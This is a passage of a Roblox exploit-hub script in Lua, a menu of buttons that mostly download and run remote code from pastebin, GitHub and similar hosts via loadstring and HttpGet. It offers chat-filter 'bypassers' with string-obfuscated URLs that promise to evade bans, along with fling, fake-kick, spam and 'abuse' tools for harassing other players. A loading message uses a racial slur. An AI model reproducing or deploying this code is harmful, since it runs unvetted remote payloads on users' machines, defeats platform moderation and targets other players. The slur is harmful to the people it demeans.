FunSection:NewButton("Rizzer", "rizz", function()loadstring(game:HttpGet("https://pastecode.dev/raw/K1EI6AwS/rizzer_lulaslollipop",true))()
1311
end)
1312
1313
FunSection:NewButton("Fake Message Troll", "type for others", function()
1314
loadstring(game:HttpGet('https://pastebin.com/raw/MBpnp3yS'))()
1315
end)
1316
1317
FunSection:NewButton("Fake boot Players๐Ÿฆต๐Ÿฝ๐Ÿคก", "pretends to kixk a player wen they leave", function()loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/fakeboot-lulaslollipop/main/fakebootanigga",true))()
1318
end)
1319
1320
FunSection:NewButton("Diskord Emojis [example: :angry:]", "type the emoji name in between the kolons", function()
1321
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/diskord_emojis/main/emojis_lulaslollipop",true))()
1322
end)
1323
1324
--[bypasses]--
1325
FunSection:NewLabel("Bypasses (no ban)")
1326
FunSection:NewButton("Explikit Bypasser๐Ÿ”ž(100% safe)", "has an antilogger so u will not be banned", function()
1327
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
1328
Library.DefaultColor = Color3.fromRGB(50,205,50)
1329
1330
Library:Notification({
1331
Text = "Loading Explikit Bypasser...",
1332
Duration = 3.2
1333
})
1334
1335
--explikitbypasser๐Ÿ”ž+
1336
loadstring(game:HttpGet(('h'..'t'..'t'..'p'..'s'..':'..'/'..'/'..'p'..'a'..'s'..'t'..'e'..'f'..'y'..'.'..'a'..'pp'..'/'..'a'..'B'..'i'..'X'..'w'..'6'..'R'..'C'..'/'..'r'..'a'..'w'), true))()
1337
1338
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
1339
Library.DefaultColor = Color3.fromRGB(50,205,50)
1340
1341
Library:Notification({
1342
Text = "loaded! have fun nigger",
1343
Duration = 3
1344
})--hookinside
1345
end)
1346
FunSection:NewButton("NGA Bypasser(100% safe)", "has an antilogger so u will not be banned", function()--ngabypasser
1347
loadstring(game:HttpGet(('h'..'t'..'t'..'p'..'s'..':'..'/'..'/'..'p'..'a'..'s'..'t'..'e'..'f'..'y'..'.'..'a'..'pp'..'/'..'J'..'h'..'8'..'r'..'s'..'l'..'a'..'5'..'/'..'r'..'a'..'w'), true))()
1348
end)
1349
1350
FunSection:NewButton("V3rge Bypasser", "kredits to owner", function()
1351
local executorEnviroment = debug.getfenv()
1352
local Services = setmetatable({}, {
1353
__index = function(_, serviceName)
1354
if debug.getfenv(2) ~= executorEnviroment then
1355
return nil;
1356
end
1357
return cloneref(game[serviceName])
1358
end
1359
})
1360
local player = Services.Players.LocalPlayer
1361
1362
loadstring(game:HttpGet("https://raw.githubusercontent.com/Synergy-Networks/products/main/BetterBypasser/publicproduct.lua",true))()
1363
end)
1364
1365
FunSection:NewButton("Spell kursewords (use L to toggle) \n(100% safe)", "use L tool to open/klose gui", function()
1366
-- spell out kurse word
1367
loadstring(game:HttpGet("https://pastebin.com/raw/xinPiBSU"))()
1368
loadstring(game:HttpGet("https://pastebin.com/raw/QzxqjgSf"))()
1369
end)
1370
1371
1372
1373
FunSection:NewLabel("Kompliment Gen")
1374
FunSection:NewButton("Kompliment Random Player", "push to kompliment a random player", function()
1375
loadstring(game:HttpGet("https://pastebin.com/raw/0n4YDguK"))()
1376
end)
1377
FunSection:NewButton("Kompliment V2", "makes u say a kompliment", function()
1378
loadstring(game:HttpGet("https://pastebin.com/raw/0HidbJsd"))()
1379
end)
1380
1381
FunSection:NewLabel("Others")
1382
FunSection:NewButton("Auto Exkuse", "auto msg wen u die", function()
1383
getgenv().dmsgs = {
1384
deathmessages = {"i was lagging", "that wasnt fair", "bruh", "dude", "i was doing something", "whyyyyy", "that wasnt fair", "wow"}
1385
}
1386
--[[
1387
Auto-Exkuse
1388
]]--
1389
loadstring(game:HttpGet("https://raw.githubusercontent.com/goldmoments/auto-excuse/main/Script"))("Auto-Exkuse Script | lulaslollipoo#0140")
1390
end)
1391
FunSection:NewButton("Kopy Server Messages", "repeats all players messages", function()local ReplicatedStorage = game:FindService("ReplicatedStorage")
1392
local ChatEvents = ReplicatedStorage:WaitForChild("DefaultChatSystemChatEvents")
1393
local OnMessageEvent = ChatEvents:WaitForChild("OnMessageDoneFiltering")
1394
local SayMessageRequest = ChatEvents:WaitForChild("SayMessageRequest")
1395
1396
if not SayMessageRequest:IsA("RemoteEvent") or not OnMessageEvent:IsA("RemoteEvent") then return end
1397
1398
local ChatLegth = require(game:FindService("Chat"):WaitForChild("ClientChatModules"):WaitForChild("ChatSettings")).MaximumMessageLength
1399
local lp = game:FindService("Players").LocalPlayer.Name
1400
1401
OnMessageEvent.OnClientEvent:Connect(function(data)
1402
if not data then return end
1403
local player = tostring(data.FromSpeaker)
1404
if player == lp then return end
1405
local message = tostring(data.Message)
1406
if (message):len() <= (ChatLegth-7) then
1407
SayMessageRequest:FireServer(('\%s'):format(message,""),tostring(data.OriginalChannel))
1408
end
1409
end)
1410
end)
1411
1412
FunSection:NewButton("Nerd Quote", " repeats all msgs with a nerd quote", function()local ReplicatedStorage = game:FindService("ReplicatedStorage")
1413
local ChatEvents = ReplicatedStorage:WaitForChild("DefaultChatSystemChatEvents")
1414
local OnMessageEvent = ChatEvents:WaitForChild("OnMessageDoneFiltering")
1415
local SayMessageRequest = ChatEvents:WaitForChild("SayMessageRequest")
1416
1417
if not SayMessageRequest:IsA("RemoteEvent") or not OnMessageEvent:IsA("RemoteEvent") then return end
1418
1419
local ChatLegth = require(game:FindService("Chat"):WaitForChild("ClientChatModules"):WaitForChild("ChatSettings")).MaximumMessageLength
1420
local lp = game:FindService("Players").LocalPlayer.Name
1421
1422
OnMessageEvent.OnClientEvent:Connect(function(data)
1423
if not data then return end
1424
local player = tostring(data.FromSpeaker)
1425
if player == lp then return end
1426
local message = tostring(data.Message)
1427
if (message):len() <= (ChatLegth-7) then
1428
SayMessageRequest:FireServer(('\"%s\"%s'):format(message,"๐Ÿค“"),tostring(data.OriginalChannel))
1429
end
1430
end)
1431
end)
1432
1433
FunSection:NewButton("Rainbow bubble Messages", "enables xhat bubble and see msg frm far away", function()
1434
--enables bubble chat also
1435
1436
textcolour = Color3.new(0,0,0)
1437
1438
game:GetService("Chat").BubbleChatEnabled = true
1439
1440
coroutine.wrap(function()
1441
1442
while wait() do
1443
1444
for i = 0,255,10 do
1445
1446
textcolour = Color3.new(255/255,i/255,0/255)
1447
1448
wait()
1449
1450
end
1451
1452
for i = 255,0,-10 do
1453
1454
textcolour = Color3.new(i/255,255/255,0/255)
1455
1456
wait()
1457
1458
end
1459
1460
for i = 0,255,10 do
1461
1462
textcolour = Color3.new(0/255,255/255,i/255)
1463
1464
wait()
1465
1466
end
1467
1468
for i = 255,0,-10 do
1469
1470
textcolour = Color3.new(0/255,i/255,255/255)
1471
1472
wait()
1473
1474
end
1475
1476
for i = 0,255,10 do
1477
1478
textcolour = Color3.new(i/255,0/255,255/255)
1479
1480
wait()
1481
1482
end
1483
1484
for i = 255,0,-10 do
1485
1486
textcolour = Color3.new(255/255,0/255,i/255)
1487
1488
wait()
1489
1490
end
1491
1492
end
1493
1494
end)()
1495
1496
local settings = {
1497
1498
}
1499
1500
while wait() do
1501
1502
pcall(function()
1503
1504
game:GetService("Chat"):SetBubbleChatSettings({
1505
1506
TextColor3 = textcolour,
1507
1508
-- The amount of time, in seconds, to wait before a bubble fades out.
1509
1510
BubbleDuration = 20,
1511
1512
-- The amount of messages to be displayed, before old ones disappear
1513
1514
-- immediately when a new message comes in.
1515
1516
MaxBubbles = 20,
1517
1518
-- Styling for the bubbles. These settings will change various visual aspects.
1519
1520
BackgroundColor3 = Color3.fromRGB(0, 0, 0),
1521
1522
TextSize = 16,
1523
1524
Font = Enum.Font.Ubuntu, --Enum.Font.GothamSemibold
1525
1526
Transparency = .1,
1527
1528
CornerRadius = UDim.new(0, 30),
1529
1530
TailVisible = true,
1531
1532
Padding = 8, -- in pixels
1533
1534
MaxWidth = 500, --in pixels
1535
1536
-- Extra space between the head and the billboard (useful if you want to
1537
1538
-- leave some space for other character billboard UIs)
1539
1540
VerticalStudsOffset = 0,
1541
1542
1543
1544
-- Space in pixels between two bubbles
1545
1546
BubblesSpacing = 3,
1547
1548
1549
1550
-- The distance (from the camera) that bubbles turn into a single bubble
1551
1552
-- with ellipses (...) to indicate chatter.
1553
1554
MinimizeDistance = 250,
1555
1556
-- The max distance (from the camera) that bubbles are shown at
1557
1558
MaxDistance = 2222,
1559
1560
})
1561
1562
end)
1563
1564
end
1565
end)
1566
1567
FunSection:NewLabel("singing/spam")
1568
FunSection:NewButton("SpamHub", "sing songs etx.", function()
1569
loadstring(game:HttpGet(('https://raw.githubusercontent.com/ColdStep2/Chatdestroyer-Hub-V1/main/Chatdestroyer%20Hub%20V1'),true))()
1570
end)
1571
FunSection:NewButton("Lyrik Bot \n(type >lyrics SongName by ArtistName)", "sing songs requested by other users", function()
1572
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
1573
Library.DefaultColor = Color3.fromRGB(50,205,50)
1574
1575
Library:Notification({
1576
Text = ">lyrics SongName by AristName (doesnt work for urself)",
1577
Duration = 7
1578
})
1579
1580
loadstring(game:HttpGet("https://raw.githubusercontent.com/CF-Trail/lyricsBot/main/singer.lua"))()
1581
end)
1582
1583
1584
local FunSection = Fun:NewSection("Humanoid")
1585
1586
FunSection:NewButton("Destroy Body", "yea", function()
1587
loadstring(game:HttpGet("https://pastebin.com/raw/naRUdxrc", true))()
1588
end)
1589
1590
FunSection:NewButton("fake lag", "lag for fun",
1591
function()loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Fe%20Fake%20Lag%20Obfuscator'))()
1592
end)
1593
1594
-- tools tab
1595
local Tools = Window:NewTab("Tools")
1596
local ToolsSection = Tools:NewSection("Tools")
1597
1598
ToolsSection:NewButton("BTools", "building tools", function()
1599
--flingtools
1600
loadstring(game:HttpGet("https://pastecode.dev/raw/na22lddw/flingtool-ghost_lulaslollipop",true))()
1601
end)
1602
1603
ToolsSection:NewButton("BTools", "building tools", function()
1604
b = Instance.new("HopperBin", game.Players.LocalPlayer.Backpack)
1605
b.BinType = 4 --del
1606
c = Instance.new("HopperBin", game.Players.LocalPlayer.Backpack)
1607
c.BinType = 3 --kopy
1608
end)--kopy&del
1609
ToolsSection:NewButton("Delete Tool", "the Delete building tool", function()
1610
b = Instance.new("HopperBin", game.Players.LocalPlayer.Backpack)
1611
b.BinType = 4
1612
end)--end.deletetool
1613
ToolsSection:NewButton("Kopy Tool", "the Kopy building tool", function()
1614
b = Instance.new("HopperBin", game.Players.LocalPlayer.Backpack)
1615
b.BinType = 3
1616
end)--end.kopytool
1617
--end btools.Tools tab
1618
ToolsSection:NewButton("Flashlight๐Ÿ”ฆ(good for horror or dark games)", "use this is dark horror games(rekommend)", function()
1619
--flashlight/FE torxh
1620
loadstring(game:HttpGet("https://pastecode.dev/raw/7o10k3hq/flashlightLS_lulaslollipop",true))()
1621
end)
1622
ToolsSection:NewButton("Free Gear Tools ๐Ÿงจ", "๐Ÿ’ฃโš™๏ธ๐Ÿ‘Š๐Ÿฝโ›“๏ธfun", function()
1623
loadstring(game:HttpGet(('https://pastefy.app/VYIAk3o1/raw'),true))()
1624
end)
1625
ToolsSection:NewButton("Klone Tool (not fe)", "lego", function()
1626
--klonez
1627
loadstring(game:HttpGet("https://pastecode.dev/raw/m4u6g9j1/klonesnotfe",true))()
1628
end)
1629
ToolsSection:NewButton("F3X", "f3x building",
1630
function()
1631
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
1632
Library.DefaultColor = Color3.fromRGB(50,205,50)
1633
1634
Library:Notification({
1635
Text = "f3x tools sinxe u wna be bob the builder",
1636
Duration = 5
1637
})
1638
--tools
1639
loadstring(game:GetObjects("rbxassetid://6695644299")[1].Source)()
1640
--F3X skript
1641
end)
1642
1643
ToolsSection:NewButton("KAKE/KAIK Tool", "gives u a kake tool to throw", function()
1644
-- KAIK ๐ŸŽ‚ TOOL
1645
loadstring(game:HttpGet("https://textbin.net/raw/tccg5bly5b"))()
1646
end)
1647
1648
ToolsSection:NewButton("Teleknesis", "works in games like brookhaven,dahood etx.", function()
1649
loadstring(game:HttpGet("https://pastebin.com/raw/vVze4jgA",true))()
1650
end)
1651
1652
ToolsSection:NewButton("Super Tools", "kool toools", function()
1653
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe/main/Super%20tools"))()
1654
end)
1655
1656
ToolsSection:NewButton("Tp Tool", "equip and press to tele anywhere", function()
1657
mouse = game.Players.LocalPlayer:GetMouse()
1658
tool = Instance.new("Tool")
1659
tool.RequiresHandle = false
1660
tool.Name = "Equip to Klixk Tp"
1661
tool.Activated:connect(function()
1662
local pos = mouse.Hit+Vector3.new(0,2.5,0)
1663
pos = CFrame.new(pos.X,pos.Y,pos.Z)
1664
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
1665
end)
1666
tool.Parent = game.Players.LocalPlayer.Backpack
1667
end)
1668
1669
ToolsSection:NewButton("Invisible Tool", "hides and unhides your body in the air", function()
1670
loadstring(game:HttpGet("https://pastebin.com/raw/LraZZsaZ",true))()
1671
end)
1672
1673
ToolsSection:NewButton("Disabled Tools", "key:AdminTools", function()
1674
loadstring(game:HttpGet('https://pastebin.com/raw/0BsHnxbk'))()
1675
end)
1676
1677
-- KEybind tools
1678
ToolsSection:NewButton("{Q} Tool", "give u Q key from ๐Ÿ’ป as a tool",
1679
function()loadstring(game:HttpGet("https://pastebin.com/raw/5ZgW4X4q"))()
1680
end)
1681
1682
ToolsSection:NewButton("{Z} Tool", "give u Z key from ๐Ÿ’ป as a tool",
1683
function()loadstring(game:HttpGet("https://pastebin.com/raw/HVTtz0JU"))()
1684
end)
1685
1686
ToolsSection:NewButton("{X} Tool", "give u X key from ๐Ÿ’ป as a tool",
1687
function()loadstring(game:HttpGet("https://pastebin.com/raw/VkFTvruh"))()
1688
end)
1689
1690
ToolsSection:NewButton("{C} Tool", "give u C Key from ๐Ÿ’ป as a tool",
1691
function()loadstring(game:HttpGet("https://pastebin.com/raw/wgxcSj5N"))()
1692
end)
1693
--Insert.keynum.toggle
1694
ToolsSection:NewButton("Toggle Tool", "gives u the 'Toggle' button as a tool {Insert}",
1695
function()loadstring(game:HttpGet("https://pastebin.com/raw/CjnNRWnK"))()
1696
end)
1697
1698
ToolsSection:NewButton("{RightKontrol} Tool", "gives u the right ktrl key frm ๐Ÿ’ป as a tool",
1699
function()loadstring(game:HttpGet("https://pastebin.com/raw/sD1NK6a7"))()
1700
end)
1701
1702
ToolsSection:NewButton("{LeftKontrol} Tool", "gives u the left ktrl button frm ๐Ÿ’ป as a tool",
1703
function()loadstring(game:HttpGet("https://pastebin.com/raw/NdEpUa4k"))()
1704
end)
1705
1706
1707
1708
-- hubs and gui
1709
local Hub = Window:NewTab("Hubs & GUIs")
1710
local HubSection = Hub:NewSection("everything u need๐Ÿ˜‹๐Ÿญ")
1711
1712
HubSection:NewButton("Roblox Innovation Rewards\n(kollekt badges/items)", "autokollekt badges/kubes", function()
1713
--voting hub skript
1714
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/innovationawards/main/autokollekt/votinghub_lulaslollipop",true))()
1715
end)
1716
1717
HubSection:NewButton("funeral home gui(works in old games \n W less players)", "kixk gui", function()
1718
--funeralhomekixkgui
1719
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/FHOMEkik/main/funeralhome_lulaslollipop",true))()
1720
end)
1721
1722
HubSection:NewButton("Tp To Player GUI (small)", "small like zuki", function()
1723
--tpgui
1724
loadstring(game:HttpGet("https://pastebin.com/raw/kfwV9ciu",true))()
1725
end)
1726
1727
HubSection:NewButton("99% fail impossible obby teleport gui", "small tp gui by me", function()
1728
loadstring(game:HttpGet("https://pastebin.com/raw/HQY7LiGn"))()
1729
end)
1730
1731
HubSection:NewButton("ANTI AFK gui (auto enabled anti-afk)", "no afk",
1732
function()
1733
loadstring(game:HttpGet("https://raw.githubusercontent.com/juywvm/-Roblox-Projects-/main/____Anti_Afk_Remastered_______"))();
1734
end)
1735
1736
HubSection:NewButton("Universal OP Shiftloxk gui", "shiftloxk ", function()
1737
-- shiftloxk gui op
1738
loadstring(game:HttpGet("https://scriptblox.com/raw/Baseplate-Universal-Script-Permanent-Shift-Lock-6924"))()
1739
end)
1740
1741
HubSection:NewButton("Keybind Tools GUI (unfinished)", "simple keybind gui", function()
1742
loadstring(game:HttpGet("https://pastebin.com/raw/1xrhfTD5"))()
1743
end)
1744
1745
HubSection:NewButton("ASTRAL HUB V3", "a hub", function()
1746
loadstring(game:HttpGet("https://raw.githubusercontent.com/Vcsk/AstralHub/main/Main.lua", true))()
1747
end)
1748
1749
HubSection:NewButton("Harsh Texh v7.4", "lots of skripts", function()
1750
loadstring(game:HttpGet(('https://raw.githubusercontent.com/YellowGreg/HarshTech7.4-Beta/main/HarshTech7.4.lua'),true))()
1751
end)
1752
1753
HubSection:NewButton("Skript Loader", "huge GUI", function()
1754
loadstring(game:HttpGet("https://pastebin.com/raw/zzYSdwhk", true))()
1755
end)
1756
1757
HubSection:NewButton("Games Hub V5 (fixed)", "fixed", function()
1758
loadstring(game:HttpGet("https://raw.githubusercontent.com/TakeModzz/Games-Hub-V5-Selector-Fixed/main/Games"))()
1759
end)
1760
1761
HubSection:NewButton("Anime Hub ๐Ÿ˜", "v6.1", function()
1762
loadstring(game:HttpGet("https://raw.githubusercontent.com/TakeModzz/Games-Hub-Script/main/Games%20Hub%20(Always%20updated)"))()
1763
end)
1764
1765
HubSection:NewButton("LegonX Hub", "kool and Many skripts", function()
1766
loadstring(game:HttpGet("https://raw.githubusercontent.com/YellowGreg/Loadstring/main/LegonX"))()
1767
end)
1768
1769
HubSection:NewButton("KOLLISION GUI", "toggls player kollision",
1770
function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/Collision.txt'),true))()
1771
end)
1772
1773
HubSection:NewButton("BIDO SKINS V1.5", "HELLA SKRIPTS", function()
1774
loadstring(game:HttpGet("https://raw.githubusercontent.com/BidoSkinsYT/BidoSkinsYT/main/Bido%20SkinsV1.5"))()
1775
end)
1776
1777
HubSection:NewButton("GHOST Hub BEST", "HELLA SKRIPTS", function()
1778
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub'))()
1779
end)
1780
1781
HubSection:NewButton("REDGHOST Hub", "gameshub", function()
1782
loadstring(game:HttpGet('https://pastebin.com/raw/WFKSRG6m'))();
1783
end)
1784
1785
HubSection:NewButton("Darkrai X Animation Hub v0.3", "FREE ANIMS R15", function()
1786
loadstring(game:HttpGet("https://raw.githubusercontent.com/GamingScripter/Animation-Hub/main/Animation%20Gui", true))()
1787
end)
1788
1789
HubSection:NewButton("Simple v3", "simple v3 hub", function()
1790
loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Simple-V3-8819", true))()
1791
end)
1792
1793
HubSection:NewButton("Abuse GUI", "abuse", function()
1794
loadstring(game:HttpGet("https://pastebin.com/raw/2XnDKHcH"))()
1795
end)
1796
1797
HubSection:NewButton("Davi hub", "games hub", function()
1798
loadstring(game:HttpGet(("https://raw.githubusercontent.com/Davicoderliner/davigui/main/Daviguiv2loader.lua"),true))()
1799
end)
1800
1801
HubSection:NewButton("Mini hub", "games hub", function()
1802
loadstring(game:HttpGet("https://raw.githubusercontent.com/MiniNoobie/MINI-HUB-V2/main/FINALLY%20UPDATED%20MINI%20HUB",true))()
1803
end)
1804
1805
HubSection:NewButton("SPIDERMAN ABILITY GUI", "klimb walls (C to toggle)", function()
1806
--SPIDER MAN GUI
1807
loadstring(game:HttpGet(('https://pastebin.com/raw/2X0hKUgq'),true))()
1808
end)
1809
1810
HubSection:NewButton("Universal Spy GUI", "player list gui", function()
1811
loadstring(game:HttpGet("https://raw.githubusercontent.com/MichaelScripter/MiniScript/main/Spy gui.lua"))()
1812
end)
1813
HubSection:NewLabel("Fling guis")
1814
1815
HubSection:NewButton("Fling GUI", "fling a player by walking into them", function()
1816
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe./main/Fling%20GUI"))()
1817
end)
1818
1819
HubSection:NewButton("fling Animator", "๐Ÿ‘Š๐Ÿฝ๐Ÿ‘Š๐Ÿฝ๐Ÿ‘Š๐Ÿฝ๐Ÿ‘Š๐Ÿฝ๐Ÿ‘Š๐Ÿฝ", function()
1820
loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_K2n31uc6t2wY5A8786eR4K15sgbUF0vdQ80a0LzgvLRkSNYd89H1AS3124gMR6SM.lua.txt'),true))()
1821
end)
1822
1823
HubSection:NewButton("Fling - press a player", "fling a player by pressing them", function()
1824
loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_5wpM7bBcOPspmX7lQ3m75SrYNWqxZ858ai3tJdEAId6jSI05IOUB224FQ0VSAswH.lua.txt'),true))()
1825
end)
1826
HubSection:NewButton("Universal Fling gui", "fling a player by pressing them", function()
1827
loadstring(game:HttpGet("https://paste.ee/r/NTtmf", true))()
1828
end)
1829
HubSection:NewLabel("...")
1830
HubSection:NewButton("Ohio Hub", "small hub", function()
1831
--Ohio GUI
1832
loadstring(game:HttpGet("https://pastebin.com/raw/hkvHeHed",true))()
1833
end)
1834
1835
HubSection:NewButton("Darkrai X", "hub", function()
1836
loadstring(game:HttpGet("https://raw.githubusercontent.com/GamingScripter/arsenal-hub/main/Arsenal%20GamingScripter", true))()
1837
end)
1838
1839
HubSection:NewButton("B Genesis V1.2", "hub", function()
1840
loadstring(game:HttpGet('https://raw.githubusercontent.com/raw-scriptpastebin/raw/main/B_Genesis'))()
1841
end)
1842
1843
HubSection:NewButton("Moon ui", "moon gui", function()
1844
loadstring(game:HttpGet('https://raw.githubusercontent.com/IlikeyocutgHAH12/MoonUI-v10-/main/MoonUI%20v10'))()
1845
end)
1846
1847
HubSection:NewButton("RTX GUI", "map kolor/theme editor",
1848
function()loadstring(game:HttpGet(('https://pastefy.app/xXkUxA0P/raw'),true))()
1849
end)
1850
1851
HubSection:NewButton("RTX GUI 2", "map kolor/theme editor", function()
1852
loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/Chillz-s-scripts/main/enhancer.txt"))()
1853
end)
1854
1855
HubSection:NewButton("FE RemX OP trolling gui", "trolling gui", function()
1856
loadstring(game:HttpGet("https://pastebin.com/raw/6TGpAUjr"))()
1857
end)
1858
1859
HubSection:NewButton("Giga Hub", "hella skripts", function()-- Giga xhad hub
1860
loadstring(game:HttpGet('https://raw.githubusercontent.com/OWJBWKQLAISH/GigaChad-Hub/main/Version%20V3.5'))()
1861
end)
1862
1863
HubSection:NewButton("Ez Hub", "yea", function()-- ez hub
1864
loadstring(game:HttpGet("https://scriptblox.com/raw/Ez-Hub_168"))()
1865
end)
1866
1867
HubSection:NewButton("Heart Ui", "heart hub", function()loadstring(game:GetObjects("rbxassetid://1313915586")[1].Source)()
1868
end)
1869
1870
HubSection:NewButton("KoolGui", "4+ skripts", function()
1871
loadstring(game:HttpGet("https://pastebin.com/raw/n3FDLDh3"))()
1872
end)
1873
1874
HubSection:NewButton("RemX Gui", "old But Op", function()
1875
loadstring(game:HttpGet(('https://raw.githubusercontent.com/Henry887/RemX-Script-Hub/main/main.lua'),true))()
1876
end)
1877
1878
HubSection:NewButton("Legon Hub", "Op hub with alot of skripts", function()
1879
loadstring(game:HttpGet('https://pastebin.com/raw/B1cUSJsv'))()
1880
end)
1881
1882
HubSection:NewButton("Bloodfest GUI", "game Gui lol", function()
1883
loadstring(game:HttpGet("https://pastebin.com/raw/MyuKiH2q", true))()
1884
end)
1885
1886
HubSection:NewButton("ZenHub", "hella skripts", function()
1887
loadstring(game:HttpGet("https://raw.githubusercontent.com/Kaizenofficiall/KaiZen/main/GameHub", true))()
1888
end)
1889
1890
HubSection:NewButton("HubSkriptWithNoHat", "dont ask about the name", function()
1891
loadstring(game:HttpGet('https://raw.githubusercontent.com/tyreltrijo/firex/main/firex'))()
1892
end)
1893
1894
HubSection:NewButton("ProHubV2", "Similar To BritishHub", function()
1895
--PROHUB V.2--
1896
loadstring(game:HttpGet(("https://raw.githubusercontent.com/Kindasua/v.2/main/Is%20here"), true))()
1897
end)
1898
1899
HubSection:NewButton("BritishHubV6", " like Prohub", function()
1900
loadstring(game:HttpGet(("https://raw.githubusercontent.com/YourLocalNzi/Ye/main/BHob6"),true))()
1901
end)
1902
1903
HubSection:NewButton("Vhub", "A big Gui full of skripts for trolling etx.", function()
1904
-- is a loadstring skript bekause skript is to large >https://roblxopayscript.godaddysites.com<
1905
1906
loadstring(game:HttpGet(('https://raw.githubusercontent.com/itsyaboivincentt5315/script/main/VHub.txt'),true))()
1907
end)
1908
1909
HubSection:NewButton("MegaHub(30+ Feature)", " ", function()
1910
loadstring(game:HttpGet(('https://raw.githubusercontent.com/WholeF00ds/Mega/main/Obfuscated%20Loader'),true))()
1911
end)
1912
1913
HubSection:NewButton("Vhub 1.2.4(New Version)", "vhub", function()
1914
loadstring(game:HttpGet("https://raw.githubusercontent.com/SourceScript5315/sauce/main/VH-Launcher.lua"))()
1915
end)
1916
1917
HubSection:NewButton("K00lK1D Gui V2", "So Skary", function()
1918
loadstring(game:GetObjects("rbxassetid://9827584846")[1].Source)()
1919
end)
1920
1921
HubSection:NewButton("Kindasu Hub", "New Gui", function()
1922
loadstring(game:HttpGet(("https://raw.githubusercontent.com/Kindasua/v.1-beta/main/Fixed%20bugs%20v.1%20beta"), true))()
1923
end)
1924
1925
HubSection:NewButton("Pro Hub", "New Gui", function()loadstring(game:HttpGet("https://pastebin.com/raw/hecGHj99"))()
1926
end)
1927
1928
HubSection:NewButton("KZS Hub", "idk ._.", function()
1929
loadstring(game:HttpGet("https://raw.githubusercontent.com/KZSHUB/KZS-HUB/main/KZSHUBV1.5", true))()
1930
end)
1931
1932
HubSection:NewButton("Frixon Hub", "Eee idk", function()
1933
loadstring(game:HttpGet('https://gist.githubusercontent.com/RedoGaming/459eb467f3df927b07ca398a68f3b053/raw/6d1f7a2c8fefd072dc53ebbbec38c6f93c7de1ad/Frixon%2520Hub!%2520New%2520OP%2520Exploit%2520Hub%2520for%2520Roblox!'))()
1934
end)
1935
1936
HubSection:NewButton("RageFlake Hub", "Lol", function()
1937
loadstring(game:HttpGet('https://gist.githubusercontent.com/RedoGaming/2e5943498c487ea97df0d436dd35c234/raw/f0445b1afcd9193bfb94bc75dda7318310a22ad2/Rageflake!%2520New%2520OP%2520Roblox%2520Exploit%2520Hub!'))()
1938
end)
1939
1940
HubSection:NewButton("Zen Hub", "Eeeeee idk", function()
1941
loadstring(game:HttpGet("https://raw.githubusercontent.com/Kaizenofficiall/KaiZen/main/GameHub", true))()
1942
end)
1943
1944
HubSection:NewButton("Ultimate Trolling Gui V3", "utg old", function()
1945
loadstring(game:HttpGet("https://raw.githubusercontent.com/Blukez/Scripts/main/UTG%20V3%20RAW"))()
1946
end)
1947
1948
HubSection:NewButton("Psy Hub", "Op and has an exekutor i think", function()
1949
loadstring(game:GetObjects("rbxassetid://3014051754")[1].Source)()
1950
end)
1951
1952
HubSection:NewButton("Gamehub V4", "request by emil", function()
1953
loadstring(game:HttpGet("https://raw.githubusercontent.com/GamerScripter/Game-Hub/main/loader"))()
1954
end)
1955
1956
HubSection:NewButton("Gigachad Hub V7", "request by emil", function()
1957
loadstring(game:HttpGet("https://raw.githubusercontent.com/LolPrivate/Side/main/Gigachad%20Hub%20V7.lua", true))()
1958
end)
1959
1960
HubSection:NewButton("FathomHub", "request by emil", function()
1961
--[[
1962
fathomhub
1963
]]
1964
loadstring(game:HttpGet("https://pastebin.com/raw/Y4AGJALY"))();
1965
end)
1966
1967
HubSection:NewButton("OrangeX Hub V5", "request by emil", function()
1968
--[[
1969
orange x hubv5
1970
]]
1971
loadstring(game:HttpGet("https://raw.githubusercontent.com/ImJosh66/Ab2rW/main/ORANGEX%20V5%20RELEASED%20ORANGEX%20ON%20TOP%20.txt"))()
1972
end)
1973
1974
HubSection:NewButton("Multi-Skripter Hub V3", "request by emil", function()
1975
--[[
1976
multi skripter hubv3
1977
]]
1978
loadstring(game:HttpGet("https://raw.githubusercontent.com/GamerScripter/Multi-Scripter-X/main/loader"))()
1979
end)
1980
1981
HubSection:NewButton("British Hub V15", "request by emil", function()
1982
--britishhub v15
1983
loadstring(game:HttpGet("https://raw.githubusercontent.com/RedCoat8102/Britishhub/main/Protected_7002515694901812.lua.txt", true))()
1984
end)
1985
HubSection:NewButton("British Hub V16 (new)", "request by emil", function()
1986
--britishhub v16 new
1987
loadstring(game:HttpGet("https://raw.githubusercontent.com/1tsFire/Br1tishHub/main/Protected_6883620778116350.lua.txt", true))()
1988
end)
1989
HubSection:NewButton("Thunder Hub", "request by emil", function()
1990
--thunderhub
1991
loadstring(game:HttpGet('https://pastebin.com/raw/DFjY4nMy'))()
1992
end)
1993
HubSection:NewButton("Davi hub v2.2", "request by emil", function()
1994
--[[
1995
davi hub2.2
1996
]]
1997
loadstring(game:HttpGet('https://raw.githubusercontent.com/Davicoderliner/davigui/main/davi.lua'))()
1998
end)
1999
HubSection:NewButton("Ultimate troll hub 2.2 (new version)", "request by emil", function()
2000
--[[
2001
ultimate troll hub 2.2
2002
]]
2003
loadstring(game:HttpGet('https://raw.githubusercontent.com/AkilExploitz/AkilBlox14-s-Script-Hub-v1.1/main/Utg%202.2%20startup'))()
2004
end)
2005
